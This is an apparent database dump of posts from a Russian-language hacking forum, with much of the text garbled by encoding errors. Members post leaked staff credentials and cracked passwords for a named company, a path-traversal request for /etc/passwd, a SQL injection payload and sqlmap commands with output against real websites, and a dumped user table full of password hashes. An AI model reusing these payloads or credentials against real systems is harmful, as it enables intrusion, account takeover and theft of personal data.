(1337, 1064, 1097, 'w0rm', 1, '', 1406852122, 'ÃÂþòыù ÷ðúð÷:[B]neoline.biz[/B]\r\nýуöýþ: øх óøт + шõûы/ñð÷ы þÿûðтð ÿþ фðúту, ò ÿü ôðü úþýтðúт õÑÂûø úтþ-тþ рð÷рþõт.\r\n\r\nñыûð øýьõúцøÑÂ, уôðûþÑÂÑŒ ôþÑÂтðть ÿðрþûø:\r\n[url]http://mobadmin.neoline.biz/admin/login[/url]\r\n[QUOTE]\r\n\r\nadmin:ac515a19b3ab17c131448de0430f9fce\r\n[email]atimokhin@neoline.biz[/email]:a290114685b5ff62b52669e18ba0051e тõх ôøр\r\n[email]mprisheltsev@neoline.biz[/email]:50d29001bc97655d2984ec29922d2fcd\r\n[email]support@neoline.biz[/email]:57b45453959ab29730ccc945fa884d47 (Soelinz07#$)\r\n[email]mkochurin@neoline.biz[/email] : 62395966c07b08a158d2a4f08d210391 (tQI4I64F)\r\n[email]susenko@neoline.biz[/email]:be763d31b3d7168d7b756ff267c3f91d(4bB3MYTW)\r\n[email]eshishaeva@neoline.biz[/email]:1ba8dfefad73087bb71442424b1daaca(cTyf98HG)\r\n[email]ababkina@neoline.biz[/email]:b9e200a13166d6564bc4e76a1cd856a8 (eyb4xnG0)\r\n[email]lbelyaev@neoline.biz[/email]:23d988b79c1a7cfd689a8085acf641ef (1234543210)\r\n[email]fpostnov@neoline.biz[/email]:1546ca12b21ab6181ac0e9861aa04c43(WNS5id3Q)\r\n[email]ikovalenko@neoline.biz[/email]:a875cba9b4c76cd824f1cc306ad7eded ÿрþóрðüüøÑÂÑ‚\r\n[email]vshilov@neoline.biz[/email]:29234e7850b2214710ce1a81af2094a5\r\n[email]kgrankina@neoline.biz[/email]:86cc74041b7992338d55a63b96b13d35 (28081988)\r\n[/QUOTE]\r\n\r\nýþ øх ÑÂüõýøûø.\r\n\r\nredmine.neoline.com - helpdesk : 87xd4txc232', 1, 0, '195.248.249.154', 0, 1, 0, 0, 0),
(1338, 1064, 1337, 'w0rm', 1, '', 1406857118, 'support : Soelinz07#$ ÿþôхþôøт ú фтÿ mx.neoline.biz , ýðшõû тðü ñÑÂúðÿ ÿþûь÷þòðтõûõù ÿþчты, ÿðрþûø ò þтúрытþü òøôõ.\n\n[url]https://cloud.mail.ru/public/f8da5d743734/_Accounts.csv[/url]', 1, 0, '195.248.249.154', 0, 1, 0, 0, 0),
(1339, 1224, 0, 'Invite', 2, 'New invite', 1406874474, '[b]Name[/b]: sickninja\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: not-now@a.org\r\n [b]e-mail[/b]: gomuci@alivance.com\r\n [b]Info[/b]: I do hack\r\n\r\nзы на этой неделе ведь рега бесплатная.', 1, 0, '89.122.99.13', 0, 1, 0, 0, 0),
(1341, 1225, 0, 'Invite', 2, 'New invite', 1406911885, '[b]Name[/b]: BigBear\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 906047\r\n [b]e-mail[/b]: BigBear2008@yandex.ru\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '91.105.185.0', 0, 1, 0, 0, 0),
(1342, 1226, 0, 'Invite', 2, 'New invite', 1406957329, '[b]Name[/b]: checkermint\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: checkermint@lsd-25.ru\r\n [b]e-mail[/b]: checkermint@hellokitty.com\r\n [b]Info[/b]: professional pen tester. want to trade findings. also looking for malware samples..', 1, 0, '62.210.74.186', 0, 1, 0, 0, 0),
(1343, 1227, 0, 'w0rm', 1, 'ukr.net', 1407011062, '_ttp://np.ukr.net/validator/pas.php\r\n12345\r\n\r\nýðôþ ñы cgi шõûû ÷ðûøть ø þñþøтø þÿÑÂý ñÑÂùѠôøр.', 1, 0, '178.44.167.25', 0, 1, 0, 0, 0),
(1344, 1228, 0, 'Invite', 2, 'New invite', 1407065204, '[b]Name[/b]: kolaw\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: kolaw\r\n [b]e-mail[/b]: kolawilm@mail.ru\r\n [b]Info[/b]: More then 10 years of of experience in vulnerability research, exploit development, reverse-engineering, and cryptography..', 1, 0, '23.238.18.177', 0, 1, 0, 0, 0),
(1345, 1229, 0, 'Invite', 2, 'New invite', 1407076981, '[b]Name[/b]: render\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: cray77@mail.ru\r\n [b]e-mail[/b]: cray77@mail.ru\r\n [b]Info[/b]: интересуюсь и занимаюсь вебом (стандартный набор из sql, lfi и т.д.), также копаю win.kernel, бывает есть что продать из баз..', 1, 0, '89.230.77.64', 0, 1, 0, 0, 0),
(1346, 1227, 1343, 'x0rg', 30, '', 1407096822, '[QUOTE=w0rm;1343]_ttp://np.ukr.net/validator/pas.php\r\n12345\r\n\r\nýðôþ ñы cgi шõûû ÷ðûøть ø þñþøтø þÿÑÂý ñÑÂùѠôøр.[/QUOTE]\r\n\r\nÃÂð WSO õÑÂть þñхþôы OpenbaseDir ÿрþñþòðû õóþ ÷ðûøòðть?', 1, 0, '188.16.92.90', 0, 1, 0, 0, 0),
(1347, 1230, 0, 'Invite', 2, 'New invite', 1407135055, '[b]Name[/b]: tetyys\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: tetyys@dukgo.com\r\n [b]e-mail[/b]: tetyys@tetyys.com\r\n [b]Info[/b]: I\\\'m mostly a developer (C#, PHP, C), but would like to learn more about underground community and also learn Russian. I\\\'m also a moderator on the most popular Lithuanian hacking site. I don\\\'t have much releases for my programming work, because I do mostly private work. I also sometimes reverse-engineer malware for white-hat purposes.\r\nI don\\\'t think I will bring lotsa vulnerabilities and trade them, but I would gladly help on programming forum (if you have one) and mostly lurk..', 1, 0, '77.241.202.203', 0, 1, 0, 0, 0),
(1348, 1206, 1305, 'null', 9, '', 1407142299, 'ýу ø úþóôð ÑÂþñõрõüÑÂÑÂ?', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0),
(1349, 1231, 0, 'null', 9, 'webinar.actionpay.ru', 1407155324, 'üþöõт úþüу øýтõрõÑÂýþ ñуôõт\r\n\r\n[quote]\r\nhùùp://webinar.actionpay.ru/archive/download.php?type=presentation&path=../../../../../../../../../../../../../../../etc/passwd\r\n[/quote]', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0),
(1352, 1232, 0, 'syslink', 13, 'UAC Bypass', 1407256846, 'тõÑÂÑÂтðýуû ýð 8 x64 рðñþтðõт\n[url]https://www.sendspace.com/file/lotats[/url]', 1, 0, '179.43.159.226', 0, 1, 0, 0, 0),
(1353, 1233, 0, 'Invite', 2, 'New invite', 1407269479, '[b]Name[/b]: haxorma\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 9393939\r\n [b]e-mail[/b]: haxorma@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .', 1, 0, '62.43.89.113', 0, 1, 0, 0, 0),
(1354, 1206, 1348, 'w0rm', 1, '', 1407289075, 'úтþ хþчõт учðÑÂтòþòðть þтÿøшøтõ тут.', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1355, 1231, 1349, 'awert', 22, '', 1407319670, 'CúуûѠýð ÑÂþÑÂõôÑÂÑ….\n[url]http://teodorus.portal.vestey.ru/ajax/set_voting[/url]\nPOST:\nvi_id=61&v_id=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(88)%2cCHAR(114)%2cCHAR(79)%2cCHAR(90)%2cCHAR(66)%2cCHAR(85)%2cCHAR(115)%2cCHAR(66))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))\n\nÒхþô ò ðôüøýúу тþûьúþ Ѡøÿð ðôüøýð.\n\n[url]http://ladycash.ru/i.php[/url]', 1, 0, '91.219.158.225', 0, 1, 0, 0, 0),
(1356, 1083, 1151, 'awert', 22, '', 1407319744, '[quote=unknown_evil;1151]òþт ýþрüðûьýðѠÑÂúуûѠòÑÂõ ôþÑÂтðõтÑÂѠýð урð!\nSqlmap -u \"https://www.employmentcrossing.com/lcactivation.php?activation=d1ddead0a20ed01bc4b916675ae2649c\" --dbs\n\n sqlmap/1.0-dev - automatic sql injection and database takeover tool\n [url]http://sqlmap.org[/url]\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\'s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting at 07:16:21\n\n[07:16:21] [info] resuming back-end dbms \'mysql\'\n[07:16:21] [info] testing connection to the target url\nsqlmap identified the following injection points with a total of 0 http(s) requests:\n---\nplace: Get\nparameter: Activation\n type: Boolean-based blind\n title: And boolean-based blind - where or having clause\n payload: Activation=d1ddead0a20ed01bc4b916675ae2649c\' and 2473=2473 and \'hoiq\'=\'hoiq\n\n type: Union query\n title: Mysql union query (null) - 78 columns\n payload: Activation=-7694\' union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x7179787971,0x6a6d465a61694e4b5353,0x7169747771),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#\n---\n[07:16:25] [info] the back-end dbms is mysql\nweb application technology: Apache\nback-end dbms: Mysql 5\n[07:16:25] [info] fetching database names\n[07:16:28] [info] the sql query used returns 4 entries\n[07:16:31] [info] retrieved: \"information_schema\"\n[07:16:34] [info] retrieved: \"ec_jp\"\n[07:16:37] [info] retrieved: \"sellingcrossing\"\n[07:16:40] [info] retrieved: \"sellingcrossing_external\"\navailable databases [4]:\n[*] ec_jp\n[*] information_schema\n[*] sellingcrossing\n[*] sellingcrossing_external[/quote]\n\nÿрø òыòþôõ úþûþýþú øûø ôðüÿõ òыôðõт þшøñúу, úтþ ÷ýðõт úðú þñþùтø?', 1, 0, '91.219.158.225', 0, 1, 0, 0, 0),
(1357, 1083, 1356, 'null', 9, '', 1407320747, '[QUOTE=awert;1356]ÿрø òыòþôõ úþûþýþú øûø ôðüÿõ òыôðõт þшøñúу, úтþ ÷ýðõт úðú þñþùтø?[/QUOTE]\r\n\r\nð þшøñúð úðúðÑÂ?', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0),
(1358, 1083, 1357, 'w0rm', 1, '', 1407323620, '[url]http://www.letoile.ru[/url]\n40 000 Ñ€ÑÂ.\n\nýуöýþ:\n[QUOTE]ýþüõрð üþñøûьýыõ, øüÑÂ[/QUOTE]', 1, 0, '96.47.226.20', 0, 1, 0, 0, 0),
(1361, 1083, 1357, 'awert', 22, '', 1407375889, '[quote=unknown_evil;1357]ð þшøñúð úðúðÑÂ?[/quote]\r\n\r\nòõрýõõ ôðöõ þшøñúу ýõ ÿþúð÷ыòðõт, ÿрþÑÂтþ òыòþô ýõ øôõт.', 1, 0, '91.219.159.26', 0, 1, 0, 0, 0),
(1362, 1083, 1361, 'null', 9, '', 1407385875, '[quote=awert;1361]òõрýõõ ôðöõ þшøñúу ýõ ÿþúð÷ыòðõт, ÿрþÑÂтþ òыòþô ýõ øôõт.[/quote]\r\nÿрþÑÂтþ ÑÂтрðýøцð ÿþ úþтþрþù ñыûð ÑÂúуûѠтõÿõрь рõôøрõúтøтÑÂÑÂ\r\n\r\nýðùôø ôþрúþü òðûøôýую ÑÂтрðýцу ñõ÷ рõôøрõúтð\r\n[quote]inurl:php?activation= site:employmentcrossing.com[/quote]\r\n\r\nýðÿрøüõр\r\n\r\n[quote][url]https://www.employmentcrossing.com/lcactivation.php?refid=1503&activation=d1ddead0a20ed01bc4b916675ae2649c%27[/url][/quote]\r\n\r\nø òÑÂõ ýþрüуûь рðñþтðõт\r\n\r\n[quote]sqlmap -u \"https://www.employmentcrossing.com/lcactivation.php?refid=1503&activation=d1ddead0a20ed01bc4b916675ae2649c\" -d ec_jp --tables\r\n [/quote]', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0),
(1363, 1230, 1347, 'syslink', 13, '', 1407426091, 'denided \r\nreason: lack of knowledge', 1, 0, '81.17.18.210', 0, 1, 0, 0, 0),
(1364, 1226, 1342, 'syslink', 13, '', 1407426191, 'perminant denied COP', 1, 0, '81.17.18.210', 0, 1, 0, 0, 0),
(1365, 1227, 1346, 'w0rm', 1, '', 1407430355, 'wso ÿðûøтÑÂѠøх ÑÂõрòõрþü, open_base_dir ò ûюñþü ÑÂûучðõ фуýúцøѠphp тõ ò cgi рðñþтðть ýõ ñуôõт, ýþ nginx у ýøх úðú тþ ÑÂтрðýýþ ýðÑÂтрþÑÂý чтþ pl ÑÂúрøÿты ÑÂúðчøòðютÑÂѠð ýõ øÑÂÿþûýÑÂÑŽÑ‚ÑÂÑÂ.\n\nýðôþ ñы ÿрþñрутøть:\n\n[php]\n-- phpMyAdmin SQL Dump\n-- version 2.10.0.2\n-- http://www.phpmyadmin.net\n-- \n-- Ã¥þÑÂÑ‚: 127.0.0.3\n-- ÒрõüѠÑÂþ÷ôðýøÑÂ: ÃÂòó 07 2014 ó., 19:47\n-- ÒõрÑÂøѠÑÂõрòõрð: 5.5.30\n-- ÒõрÑÂøѠPHP: 5.4.13\n\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\n\n-- \n-- Ñð÷ð ôðýýых: `bsql`\n-- \n\n-- --------------------------------------------------------\n\n-- \n-- áтруúтурð тðñûøцы `users`\n-- \n\nCREATE TABLE `users` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `login` varchar(40) NOT NULL DEFAULT \'\',\n `passw` varchar(100) NOT NULL DEFAULT \'\',\n `cookie` varchar(32) NOT NULL DEFAULT \'\',\n `vtime` datetime NOT NULL DEFAULT \'0000-00-00 00:00:00\',\n PRIMARY KEY (`id`)\n) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT=\'î÷õры\' AUTO_INCREMENT=77 ;\n\n-- \n-- Ãâ€Ã°Ã¼Ã¿ ôðýýых тðñûøцы `users`\n-- \n\nINSERT INTO `users` (`id`, `login`, `passw`, `cookie`, `vtime`) VALUES \n(1, \'master\', \'b0be1e547f7a5ee3ffd555428b019d9c\', \'\', \'2014-08-07 07:29:43\'),\n(2, \'misha\', \'1b6c9d1b5e84873fbaca267708d16469\', \'\', \'2014-07-18 15:00:00\'),\n(3, \'grisha\', \'deada030e20b7a089e278d27bd875bd4_locked_\', \'\', \'0000-00-00 00:00:00\'),\n(4, \'sharun\', \'da44c4cfb061610b74c646fed8343a8b\', \'\', \'0000-00-00 00:00:00\'),\n(5, \'mbkom\', \'82efc341d8cbe574b745025aa527568f\', \'\', \'2009-09-21 14:46:51\'),\n(6, \'sulya\', \'0d3d201e551d3b54ab61d6d2ed1b5c25_locked_\', \'\', \'0000-00-00 00:00:00\'),\n(7, \'moder1\', \'2837260221cb881b04a0575549c75579\', \'\', \'2010-04-26 22:17:02\'),\n(8, \'moderator1\', \'f409aa34367789f30b5850b63b5df870\', \'\', \'2009-06-01 10:21:35\'),\n(9, \'akella\', \'f67fd85522b4082671feae41509ad7eb\', \'f67fd85522b4082671feae41509ad7eb\', \'2010-05-18 20:17:01\'),\n(10, \'maria\', \'f3717533a90a8ecb1de730050beab052\', \'f3717533a90a8ecb1de730050beab052\', \'2009-02-11 16:56:14\'),\n(11, \'avizenou\', \'983ae9a305b6569a90fbe2a6ea92da3f\', \'\', \'0000-00-00 00:00:00\'),\n(12, \'erezbahat\', \'6f1e91b448716344ba24bc47b88b8d87_locked_\', \'\', \'0000-00-00 00:00:00\'),\n(14, \'julia\', \'4079284fd6664377f6e8247fc1ad9397\', \'\', \'0000-00-00 00:00:00\'),\n(15, \'zomb\', \'b77b6e45cd9c2998c6e461a46218847b\', \'\', \'2013-11-26 07:56:22\'),\n(16, \'moderator2\', \'dc883c6ad08f850811d7289c3f65860d\', \'\', \'0000-00-00 00:00:00\'),\n(17, \'moderator3\', \'c5640ac37b3e2d7de786976a6ec8c493\', \'c5640ac37b3e2d7de786976a6ec8c493\', \'2007-09-17 11:09:57\'),\n(18, \'marina\', \'9df79be2ca0795b0641e8aa3d3f21ffc\', \'\', \'0000-00-00 00:00:00\'),\n(19, \'yevgeniy\', \'e25e799a4a8a51135d4501ba92f79537\', \'\', \'0000-00-00 00:00:00\'),\n(20, \'irina-sem\', \'44ba16d827ca38e7ff99bf5c811a4017\', \'\', \'2010-09-24 11:01:07\'),\n(21, \'moderator4\', \'99631b6d76c4e99300b067033dd32257\', \'\', \'2008-08-28 11:40:17\'),\n(22, \'moderator5\', \'b93818091ad6826e8537122de00fb535\', \'\', \'0000-00-00 00:00:00\'),\n(23, \'moderator6\', \'aeb08d57711888eca74f46ff29786ef4\', \'\', \'0000-00-00 00:00:00\'),\n(24, \'moderator7\', \'e2b8223f32ca013952cd9ba3715be8eb\', \'\', \'2008-04-25 14:13:04\'),\n(25, \'alexandra\', \'e3a0bc021ddd77d43917d64b10e30568_locked_\', \'e3a0bc021ddd77d43917d64b10e30568\', \'2008-01-10 13:21:38\'),\n(26, \'andrey\', \'827ccb0eea8a706c4c34a16891f84e7b\', \'\', \'0000-00-00 00:00:00\'),\n(27, \'stepenko\', \'9cb60ff7b51a92906b1a876b83c83b55_locked_\', \'\', \'0000-00-00 00:00:00\'),\n(28, \'kovalchuk\', \'916404b9f23fc4efb48bb00254540a8a_locked_\', \'\', \'2008-04-02 13:28:19\'),\n(29, \'moderator8\', \'cbb992661c4430d1f3419aff73326f17\', \'\', \'0000-00-00 00:00:00\'),\n(30, \'moderator9\', \'12ad18636e440aaaf3029172cbe02e1f\', \'\', \'0000-00-00 00:00:00\'),\n(31, \'osipova\', \'c67e09ac4c42f2708ebb77da2f5fbff8\', \'\', \'0000-00-00 00:00:00\'),\n(32, \'yana\', \'4495843fa5e22a941135cc44b8e6db7a_locked_\', \'\', \'2007-08-07 15:17:09\'),\n(33, \'antonina\', \'8ef7bf48ab11440bb0df8a1b6a1adab8\', \'\', \'2007-03-03 10:02:03\'),\n(35, \'mila\', \'e9dc5f3c6a2cf43d8a8f25a57ccafff3\', \'\', \'2009-03-11 15:15:59\'),\n(34, \'moda\', \'0d5f1ae6e61c87ff73a8dbcdec28f901\', \'0d5f1ae6e61c87ff73a8dbcdec28f901\', \'2007-08-13 18:59:52\'),\n(36, \'marish\', \'1ce3a4ed2e2ceebd3c1eb3064d247f59\', \'\', \'2007-09-07 11:04:33\'),\n(37, \'Moderator10\', \'749a1b560e0f8e180f75552215f94b88\', \'\', \'2007-10-02 11:36:43\'),\n(40, \'cover\', \'1fe5b4c3e1819c0124c20a304d2a5503\', \'\', \'2009-10-26 18:32:32\'),\n(39, \'sixonic\', \'fdd2e7a1e01f9d80b8acbd6afeb92764\', \'\', \'2007-10-26 10:19:29\'),\n(42, \'svetlana\', \'2b5e6d66d27edcca802ee8ce55966dfc\', \'\', \'2008-03-21 10:44:52\'),\n(44, \'Vitaly\', \'9caab021b268e833a881414b54b446ae\', \'\', \'2008-07-08 16:50:37\'),\n(41, \'softwood\', \'8f544c07e9633a9e44e39078dab8c7b4\', \'\', \'2009-07-22 12:07:22\'),\n(43, \'jass\', \'5b4e7a318cc5541d6fe8dd1698344339\', \'5b4e7a318cc5541d6fe8dd1698344339\', \'2008-08-21 14:42:44\'),\n(48, \'playadmin\', \'60b013b8462ec85ac93436b73998c831\', \'\', \'2008-07-18 15:25:20\'),\n(45, \'Kotos\', \'1d7005a6e39ba5015f5ea924bf23034e\', \'1d7005a6e39ba5015f5ea924bf23034e\', \'2008-07-04 14:25:21\'),\n(46, \'lazey \', \'64d299a04e7ab83e8029cca56a300bb4_locked\', \'\', \'2011-04-15 18:11:53\'),\n(49, \'pav3741\', \'cf012cbdefeda184938c9e7a2275fafa\', \'\', \'2009-06-22 17:56:17\'),\n(47, \'tanya\', \'11135fb6461fbdc91eea2090c19043d3\', \'\', \'0000-00-00 00:00:00\'),\n(50, \'nightfall\', \'8c4a9e98cf2c261d046cebdba5eeaa35\', \'\', \'2008-08-13 12:53:46\'),\n(51, \'ivaschenko\', \'c7e89dfd0780b4dc28b2588e5c6d723f\', \'c7e89dfd0780b4dc28b2588e5c6d723f\', \'2008-08-13 13:03:52\'),\n(52, \'belka\', \'77153487d8aad4598b9ad2dc2b73e0bc\', \'\', \'2009-05-14 12:34:13\'),\n(53, \'mpopov\', \'3806fd2591ebd913469b3a9c641fbb5a\', \'\', \'2009-02-20 17:01:18\'),\n(54, \'kdobryvecher\', \'90f30bbc3c78fb9427fed979df353d51_locked_\', \'\', \'2010-02-18 12:28:02\'),\n(56, \'Dita\', \'5ac7a30784818df26801f4d72e335a8f\', \'\', \'2011-03-10 17:29:21\'),\n(55, \'dimam\', \'cd2ba77b6d2a89ef3040a27c1596c944\', \'\', \'2010-02-27 14:35:51\'),\n(60, \'musienko\', \'d69f477d82a96f6d3183ec01350d9872\', \'d69f477d82a96f6d3183ec01350d9872\', \'2011-10-17 11:58:36\'),\n(58, \'kuharchuk\', \'7c989bafe7a08b89c0a11e9ce21fc113\', \'\', \'2010-08-03 09:59:53\'),\n(57, \'anet\', \'37eef497a59874b8cc2cb15acc0692ea\', \'\', \'2009-04-24 11:26:06\'),\n(59, \'Galina\', \'b0c0a814e3c0e68da4df1f2c816ce265\', \'\', \'2009-11-04 11:04:00\'),\n(62, \'Ira\', \'7207862f7579d3e30ec0b5c1c6506700\', \'\', \'0000-00-00 00:00:00\'),\n(61, \'golik\', \'f2c7e6883067373205a10604cc878d34\', \'\', \'2012-01-22 20:36:08\'),\n(64, \'t-oksana\', \'c61183364bbb3a54fe8f95036a04ac5b\', \'\', \'2014-04-03 06:18:04\'),\n(63, \'m.adamchuk\', \'7d9f2cfa6c435f3f32712179bb5587ab\', \'\', \'2009-10-21 13:26:50\'),\n(65, \'svoloch\', \'1fe5b4c3e1819c0124c20a304d2a5503\', \'\', \'2011-02-10 16:36:44\'),\n(66, \'furlet\', \'cf392b4711b78b6bff7fa4f0e0887754\', \'cf392b4711b78b6bff7fa4f0e0887754\', \'2011-06-06 16:30:12\'),\n(67, \'Roma\', \'9f71560c432f7657b215840cfd6068fe\', \'\', \'2010-09-09 16:20:14\'),\n(69, \'Smorodinova_L\', \'eb2e1832165dc32dccbb6c9fc20ba05e\', \'\', \'2013-02-25 08:12:38\'),\n(68, \'anna_seo\', \'6e3b8e8298a1b7c48f941ef1a0da6255\', \'\', \'2012-06-11 14:20:51\'),\n(70, \'pashura\', \'b13d27280cd0d8320d46c13d44a1fb81\', \'\', \'2014-08-06 12:22:15\'),\n(71, \'xena\', \'d8ffe0099bb7e2c98f8e6e5c37baffa2\', \'\', \'2012-02-17 13:50:31\'),\n(72, \'3vil\', \'276d04854e682c9f108aeca1381faf02\', \'\', \'2011-07-14 13:01:10\'),\n(73, \'random\', \'c4ca4238a0b923820dcc509a6f75849b\', \'b77b6e45cd9c2998c6e461a46218847b\', \'2011-09-15 18:17:52\');\n[/php]', 1, 0, '50.7.210.37', 0, 1, 0, 0, 0),
(1366, 1227, 1346, 'w0rm', 1, '', 1407430356, 'wso ÿðûøтÑÂѠøх ÑÂõрòõрþü, open_base_dir ò ûюñþü ÑÂûучðõ фуýúцøѠphp тõ ò cgi рðñþтðть ýõ ñуôõт, ýþ nginx у ýøх úðú тþ ÑÂтрðýýþ ýðÑÂтрþÑÂý чтþ pl ÑÂúрøÿты ÑÂúðчøòðютÑÂѠð ýõ øÑÂÿþûýÑÂÑŽÑ‚ÑÂÑÂ.\r\n\r\nýðôþ ñы ÿрþñрутøть:\r\n\r\n[php]\r\n-- phpMyAdmin SQL Dump\r\n-- version 2.10.0.2\r\n-- http://www.phpmyadmin.net\r\n-- \r\n-- Ã¥þÑÂÑ‚: 127.0.0.3\r\n-- ÒрõüѠÑÂþ÷ôðýøÑÂ: ÃÂòó 07 2014 ó., 19:47\r\n-- ÒõрÑÂøѠÑÂõрòõрð: 5.5.30\r\n-- ÒõрÑÂøѠPHP: 5.4.13\r\n\r\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\r\n\r\n-- \r\n-- Ñð÷ð ôðýýых: `bsql`\r\n-- \r\n\r\n-- --------------------------------------------------------\r\n\r\n-- \r\n-- áтруúтурð тðñûøцы `users`\r\n-- \r\n\r\nCREATE TABLE `users` (\r\n `id` int(11) NOT NULL AUTO_INCREMENT,\r\n `login` varchar(40) NOT NULL DEFAULT \'\',\r\n `passw` varchar(100) NOT NULL DEFAULT \'\',\r\n `cookie` varchar(32) NOT NULL DEFAULT \'\',\r\n `vtime` datetime NOT NULL DEFAULT \'0000-00-00 00:00:00\',\r\n PRIMARY KEY (`id`)\r\n) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT=\'î÷õры\' AUTO_INCREMENT=77 ;\r\n\r\n-- \r\n-- Ãâ€Ã°Ã¼Ã¿ ôðýýых тðñûøцы `users`\r\n-- \r\n\r\nINSERT INTO `users` (`id`, `login`, `passw`, `cookie`, `vtime`) VALUES \r\n(1, \'master\', \'b0be1e547f7a5ee3ffd555428b019d9c\', \'\', \'2014-08-07 07:29:43\'),\r\n(2, \'misha\', \'1b6c9d1b5e84873fbaca267708d16469\', \'\', \'2014-07-18 15:00:00\'),\r\n(3, \'grisha\', \'deada030e20b7a089e278d27bd875bd4_locked_\', \'\', \'0000-00-00 00:00:00\'),\r\n(4, \'sharun\', \'da44c4cfb061610b74c646fed8343a8b\', \'\', \'0000-00-00 00:00:00\'),\r\n(5, \'mbkom\', \'82efc341d8cbe574b745025aa527568f\', \'\', \'2009-09-21 14:46:51\'),\r\n(6, \'sulya\', \'0d3d201e551d3b54ab61d6d2ed1b5c25_locked_\', \'\', \'0000-00-00 00:00:00\'),\r\n(7, \'moder1\', \'2837260221cb881b04a0575549c75579\', \'\', \'2010-04-26 22:17:02\'),\r\n(8, \'moderator1\', \'f409aa34367789f30b5850b63b5df870\', \'\', \'2009-06-01 10:21:35\'),\r\n(9, \'akella\', \'f67fd85522b4082671feae41509ad7eb\', \'f67fd85522b4082671feae41509ad7eb\', \'2010-05-18 20:17:01\'),\r\n(10, \'maria\', \'f3717533a90a8ecb1de730050beab052\', \'f3717533a90a8ecb1de730050beab052\', \'2009-02-11 16:56:14\'),\r\n(11, \'avizenou\', \'983ae9a305b6569a90fbe2a6ea92da3f\', \'\', \'0000-00-00 00:00:00\'),\r\n(12, \'erezbahat\', \'6f1e91b448716344ba24bc47b88b8d87_locked_\', \'\', \'0000-00-00 00:00:00\'),\r\n(14, \'julia\', \'4079284fd6664377f6e8247fc1ad9397\', \'\', \'0000-00-00 00:00:00\'),\r\n(15, \'zomb\', \'b77b6e45cd9c2998c6e461a46218847b\', \'\', \'2013-11-26 07:56:22\'),\r\n(16, \'moderator2\', \'dc883c6ad08f850811d7289c3f65860d\', \'\', \'0000-00-00 00:00:00\'),\r\n(17, \'moderator3\', \'c5640ac37b3e2d7de786976a6ec8c493\', \'c5640ac37b3e2d7de786976a6ec8c493\', \'2007-09-17 11:09:57\'),\r\n(18, \'marina\', \'9df79be2ca0795b0641e8aa3d3f21ffc\', \'\', \'0000-00-00 00:00:00\'),\r\n(19, \'yevgeniy\', \'e25e799a4a8a51135d4501ba92f79537\', \'\', \'0000-00-00 00:00:00\'),\r\n(20, \'irina-sem\', \'44ba16d827ca38e7ff99bf5c811a4017\', \'\', \'2010-09-24 11:01:07\'),\r\n(21, \'moderator4\', \'99631b6d76c4e99300b067033dd32257\', \'\', \'2008-08-28 11:40:17\'),\r\n(22, \'moderator5\', \'b93818091ad6826e8537122de00fb535\', \'\', \'0000-00-00 00:00:00\'),\r\n(23, \'moderator6\', \'aeb08d57711888eca74f46ff29786ef4\', \'\', \'0000-00-00 00:00:00\'),\r\n(24, \'moderator7\', \'e2b8223f32ca013952cd9ba3715be8eb\', \'\', \'2008-04-25 14:13:04\'),\r\n(25, \'alexandra\', \'e3a0bc021ddd77d43917d64b10e30568_locked_\', \'e3a0bc021ddd77d43917d64b10e30568\', \'2008-01-10 13:21:38\'),\r\n(26, \'andrey\', \'827ccb0eea8a706c4c34a16891f84e7b\', \'\', \'0000-00-00 00:00:00\'),\r\n(27, \'stepenko\', \'9cb60ff7b51a92906b1a876b83c83b55_locked_\', \'\', \'0000-00-00 00:00:00\'),\r\n(28, \'kovalchuk\', \'916404b9f23fc4efb48bb00254540a8a_locked_\', \'\', \'2008-04-02 13:28:19\'),\r\n(29, \'moderator8\', \'cbb992661c4430d1f3419aff73326f17\', \'\', \'0000-00-00 00:00:00\'),\r\n(30, \'moderator9\', \'12ad18636e440aaaf3029172cbe02e1f\', \'\', \'0000-00-00 00:00:00\'),\r\n(31, \'osipova\', \'c67e09ac4c42f2708ebb77da2f5fbff8\', \'\', \'0000-00-00 00:00:00\'),\r\n(32, \'yana\', \'4495843fa5e22a941135cc44b8e6db7a_locked_\', \'\', \'2007-08-07 15:17:09\'),\r\n(33, \'antonina\', \'8ef7bf48ab11440bb0df8a1b6a1adab8\', \'\', \'2007-03-03 10:02:03\'),\r\n(35, \'mila\', \'e9dc5f3c6a2cf43d8a8f25a57ccafff3\', \'\', \'2009-03-11 15:15:59\'),\r\n(34, \'moda\', 